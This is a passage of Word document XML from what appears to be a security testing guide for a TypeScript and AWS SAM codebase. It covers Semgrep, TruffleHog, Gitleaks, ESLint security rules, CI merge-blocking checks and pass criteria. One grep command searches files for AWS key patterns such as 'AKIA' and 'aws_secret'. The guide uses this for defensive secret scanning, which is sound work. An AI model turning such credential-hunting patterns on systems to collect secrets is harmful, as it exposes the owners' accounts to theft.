          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">semgrep --config=p/jwt .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">semgrep --config=p/secrets .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">semgrep --config=p/nodejs .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">semgrep --config=p/typescript .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Run all security rulesets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">semgrep --config=auto --severity=ERROR --severity=WARNING .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Secret Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># TruffleHog — scan git history for leaked secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">trufflehog git file://. --only-verified</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Gitleaks — scan current codebase and commit history</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">gitleaks detect --source . --verbose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Check for hardcoded AWS credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -rn 'AKIA\|ASIA\|aws_secret\|aws_access' . \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  --include='*.ts' --include='*.js' --include='*.json' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  --include='*.yaml' --include='*.env' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | grep -v node_modules | grep -v .git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">ESLint Security Rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Add to .eslintrc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  "plugins": ["security"],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  "rules": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "security/detect-eval-with-expression": "error",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "security/detect-non-literal-regexp": "warn",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "security/detect-object-injection": "warn",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "security/detect-possible-timing-attacks": "error",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "no-eval": "error",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "no-implied-eval": "error"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">CI/CD Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following security checks must run on every pull request and block merge if they fail:</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00"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Block on Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High/critical CVEs in dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">npm audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardcoded secrets in code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Gitleaks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Top 10 patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Semgrep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes — ERROR severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TypeScript strict type check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">tsc --noEmit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SAM template validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">sam validate --lint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium CVEs in dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">npm audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No — warn only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Semgrep WARNING severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Semgrep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No — warn only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero high or critical CVEs in production dependencies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero hardcoded secrets in codebase or git history</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero SAST findings at ERROR severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TypeScript compiles clean in strict mode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
